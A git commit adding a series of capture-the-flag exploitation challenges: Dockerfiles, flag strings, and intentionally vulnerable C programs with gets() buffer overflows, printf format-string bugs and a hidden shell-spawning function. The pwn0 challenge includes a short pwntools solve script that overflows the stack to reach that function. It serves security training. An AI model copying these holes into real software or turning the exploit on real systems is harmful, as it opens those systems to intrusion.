Add pwn series

36e3ecdf · Daniel Petri · 3ef16dea · 36e3ecdf · 36e3ecdf · 36e3ecdf
Commit 36e3ecdf authored 1 year ago by Daniel Petri
--- a/pwn/pwn0/Dockerfile
+++ b/pwn/pwn0/Dockerfile
+# docker build -t pwn0 . && docker run -p 1024:1024 --rm -it pwn0
+FROM ubuntu:20.04
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+WORKDIR /home/ctf
+COPY pwn0 .
+COPY flag .
+COPY ynetd .
+RUN chmod +x ynetd pwn0
+RUN chown -R root:root /home/ctf
+USER ctf
+CMD ./ynetd ./pwn0
\ No newline at end of file
--- a/pwn/pwn0/flag
+++ b/pwn/pwn0/flag
+CSCG{NOW_PRACTICE_EVEN_MORE}
--- a/pwn/pwn0/pwn0
+++ b/pwn/pwn0/pwn0
--- a/pwn/pwn0/pwn0.c
+++ b/pwn/pwn0/pwn0.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+// pwn1: gcc pwn0.c -no-pie -o pwn0 -fno-stack-protector
+// --------------------------------------------------- SETUP
+void ignore_me_init_buffering() {
+	setvbuf(stdout, NULL, _IONBF, 0);
+	setvbuf(stdin, NULL, _IONBF, 0);
+	setvbuf(stderr, NULL, _IONBF, 0);
+}
+void kill_on_timeout(int sig) {
+  if (sig == SIGALRM) {
+  	printf("[!] Anti DoS Signal. Patch me out for testing.");
+    _exit(0);
+  }
+}
+void ignore_me_init_signal() {
+	signal(SIGALRM, kill_on_timeout);
+	alarm(60);
+}
+// --------------------------------------------------- MENU
+void WINgardium_leviosa() {
+    printf("┌───────────────────────┐\n");
+    printf("│ You are a Slytherin.. │\n");
+    printf("└───────────────────────┘\n");
+    system("/bin/sh");
+}
+void AAAAAAAA() {
+    char read_buf[0xff];
+    printf(" enter your magic spell:\n");
+    gets(read_buf);
+    printf("~ Protego!\n");
+}
+// --------------------------------------------------- MAIN
+void main(int argc, char* argv[]) {
+	ignore_me_init_buffering();
+	ignore_me_init_signal();
+    AAAAAAAA();
+}
--- a/pwn/pwn0/solve.py
+++ b/pwn/pwn0/solve.py
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template pwn0
+from pwn import *
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF(args.EXE or 'pwn0')
+# Many built-in settings can be controlled on the command-line and show up
+# in "args".  For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+def start(argv=[], *a, **kw):
+    '''Start the exploit against the target.'''
+    if args.GDB:
+        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+    else:
+        return process([exe.path] + argv, *a, **kw)
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+tbreak main
+continue
+'''.format(**locals())
+#===========================================================
+#                    EXPLOIT GOES HERE
+#===========================================================
+# Arch:     amd64-64-little
+# RELRO:    Partial RELRO
+# Stack:    No canary found
+# NX:       NX enabled
+# PIE:      No PIE (0x400000)
+io = start()
+io.recvuntil(b"enter your magic spell:")
+io.sendline(cyclic_find(b'qaac')*b'A' + p64(0x0000000000401380) + p64(exe.sym['WINgardium_leviosa']))
+io.interactive()
--- a/pwn/pwn0/ynetd
+++ b/pwn/pwn0/ynetd
--- a/pwn/pwn1/Dockerfile
+++ b/pwn/pwn1/Dockerfile
+# docker build -t pwn1 . && docker run -p 1024:1024 --rm -it pwn1
+FROM ubuntu:19.10
+# Using this repo, since the official is down (end EOL)
+RUN sed 's@archive.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN sed 's@security.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN apt-get update
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+WORKDIR /home/ctf
+COPY pwn1 .
+COPY flag .
+COPY ynetd .
+RUN chmod +x ynetd pwn1
+RUN chown -R root:root /home/ctf
+USER ctf
+CMD ./ynetd ./pwn1
\ No newline at end of file
--- a/pwn/pwn1/flag
+++ b/pwn/pwn1/flag
+CSCG{NOW_PRACTICE_EVEN_MORE}
--- a/pwn/pwn1/intro-pwn-1.zip
+++ b/pwn/pwn1/intro-pwn-1.zip
--- a/pwn/pwn1/pwn1
+++ b/pwn/pwn1/pwn1
--- a/pwn/pwn1/pwn1.c
+++ b/pwn/pwn1/pwn1.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+// pwn1: gcc pwn1.c -o pwn1 -fno-stack-protector
+// --------------------------------------------------- SETUP
+void ignore_me_init_buffering() {
+	setvbuf(stdout, NULL, _IONBF, 0);
+	setvbuf(stdin, NULL, _IONBF, 0);
+	setvbuf(stderr, NULL, _IONBF, 0);
+}
+void kill_on_timeout(int sig) {
+  if (sig == SIGALRM) {
+  	printf("[!] Anti DoS Signal. Patch me out for testing.");
+    _exit(0);
+  }
+}
+void ignore_me_init_signal() {
+	signal(SIGALRM, kill_on_timeout);
+	alarm(60);
+}
+// --------------------------------------------------- MENU
+void WINgardium_leviosa() {
+    printf("┌───────────────────────┐\n");
+    printf("│ You are a Slytherin.. │\n");
+    printf("└───────────────────────┘\n");
+    system("/bin/sh");
+}
+void welcome() {
+    char read_buf[0xff];
+    printf("Enter your witch name:\n");
+    gets(read_buf);
+    printf("┌───────────────────────┐\n");
+    printf("│ You are a Hufflepuff! │\n");
+    printf("└───────────────────────┘\n");
+    printf(read_buf);
+}
+void AAAAAAAA() {
+    char read_buf[0xff];
+    printf(" enter your magic spell:\n");
+    gets(read_buf);
+    if(strcmp(read_buf, "Expelliarmus") == 0) {
+        printf("~ Protego!\n");
+    } else {
+        printf("-10 Points for Hufflepuff!\n");
+        _exit(0);
+    }
+}
+// --------------------------------------------------- MAIN
+void main(int argc, char* argv[]) {
+	ignore_me_init_buffering();
+	ignore_me_init_signal();
+    welcome();
+    AAAAAAAA();
+}
--- a/pwn/pwn1/ynetd
+++ b/pwn/pwn1/ynetd
--- a/pwn/pwn2/Dockerfile
+++ b/pwn/pwn2/Dockerfile
+# docker build -t pwn2 . && docker run -p 1024:1024 --rm -it pwn2
+FROM ubuntu:19.10
+# Using this repo, since the official is down (end EOL)
+RUN sed 's@archive.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN sed 's@security.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN apt-get update
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+WORKDIR /home/ctf
+COPY pwn2 .
+COPY flag .
+COPY ynetd .
+RUN chmod +x ynetd pwn2
+RUN chown -R root:root /home/ctf
+USER ctf
+CMD ./ynetd ./pwn2
\ No newline at end of file
--- a/pwn/pwn2/flag
+++ b/pwn/pwn2/flag
+CSCG{THIS_IS_TEST_FLAG}
\ No newline at end of file
--- a/pwn/pwn2/pwn2
+++ b/pwn/pwn2/pwn2
--- a/pwn/pwn2/pwn2.c
+++ b/pwn/pwn2/pwn2.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+#ifndef PASSWORD
+    #define PASSWORD "CSCG{FLAG_FROM_STAGE_1}"
+#endif
+// pwn2: gcc pwn2.c -o pwn2
+// --------------------------------------------------- SETUP
+void ignore_me_init_buffering() {
+	setvbuf(stdout, NULL, _IONBF, 0);
+	setvbuf(stdin, NULL, _IONBF, 0);
+	setvbuf(stderr, NULL, _IONBF, 0);
+}
+void kill_on_timeout(int sig) {
+  if (sig == SIGALRM) {
+  	printf("[!] Anti DoS Signal. Patch me out for testing.");
+    _exit(0);
+  }
+}
+void ignore_me_init_signal() {
+	signal(SIGALRM, kill_on_timeout);
+	alarm(60);
+}
+// just a safe alternative to gets()
+size_t read_input(int fd, char *buf, size_t size) {
+  size_t i;
+  for (i = 0; i < size-1; ++i) {
+    char c;
+    if (read(fd, &c, 1) <= 0) {
+      _exit(0);
+    }
+    if (c == '\n') {
+      break;
+    }
+    buf[i] = c;
+  }
+  buf[i] = '\0';
+  return i;
+}
+// --------------------------------------------------- MENU
+void WINgardium_leviosa() {
+    printf("┌───────────────────────┐\n");
+    printf("│ You are a Slytherin.. │\n");
+    printf("└───────────────────────┘\n");
+    system("/bin/sh");
+}
+void check_password_stage1() {
+    char read_buf[0xff];
+    printf("Enter the password of stage 1:\n");
+    memset(read_buf, 0, sizeof(read_buf));
+    read_input(0, read_buf, sizeof(read_buf));
+    if(strcmp(read_buf, PASSWORD) != 0) {
+        printf("-10 Points for Ravenclaw!\n");
+        _exit(0);
+    } else {
+        printf("+10 Points for Ravenclaw!\n");
+    }
+}
+void welcome() {
+    char read_buf[0xff];
+    printf("Enter your witch name:\n");
+    gets(read_buf);
+    printf("┌───────────────────────┐\n");
+    printf("│ You are a Ravenclaw!  │\n");
+    printf("└───────────────────────┘\n");
+    printf(read_buf);
+}
+void AAAAAAAA() {
+    char read_buf[0xff];
+    printf(" enter your magic spell:\n");
+    gets(read_buf);
+    if(strcmp(read_buf, "Expelliarmus") == 0) {
+        printf("~ Protego!\n");
+    } else {
+        printf("-10 Points for Ravenclaw!\n");
+        _exit(0);
+    }
+}
+// --------------------------------------------------- MAIN
+void main(int argc, char* argv[]) {
+	  ignore_me_init_buffering();
+	  ignore_me_init_signal();
+    check_password_stage1();
+    welcome();
+    AAAAAAAA();
+}
--- a/pwn/pwn2/ynetd
+++ b/pwn/pwn2/ynetd
--- a/pwn/pwn3/Dockerfile
+++ b/pwn/pwn3/Dockerfile
+# docker build -t pwn3 . && docker run -p 1024:1024 --rm -it pwn3
+FROM ubuntu:19.10
+# Using this repo, since the official is down (end EOL)
+RUN sed 's@archive.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN sed 's@security.ubuntu.com@mirror.fairway.ne.jp@' -i /etc/apt/sources.list
+RUN apt-get update
+RUN useradd -d /home/ctf/ -m -p ctf -s /bin/bash ctf
+RUN echo "ctf:ctf" | chpasswd
+WORKDIR /home/ctf
+COPY pwn3 .
+COPY flag .
+COPY ynetd .
+RUN chmod +x ynetd pwn3
+RUN chown -R root:root /home/ctf
+USER ctf
+CMD ./ynetd ./pwn3
\ No newline at end of file
--- a/pwn/pwn3/flag
+++ b/pwn/pwn3/flag
+CSCG{THIS_IS_TEST_FLAG}
\ No newline at end of file
--- a/pwn/pwn3/libc.so.6
+++ b/pwn/pwn3/libc.so.6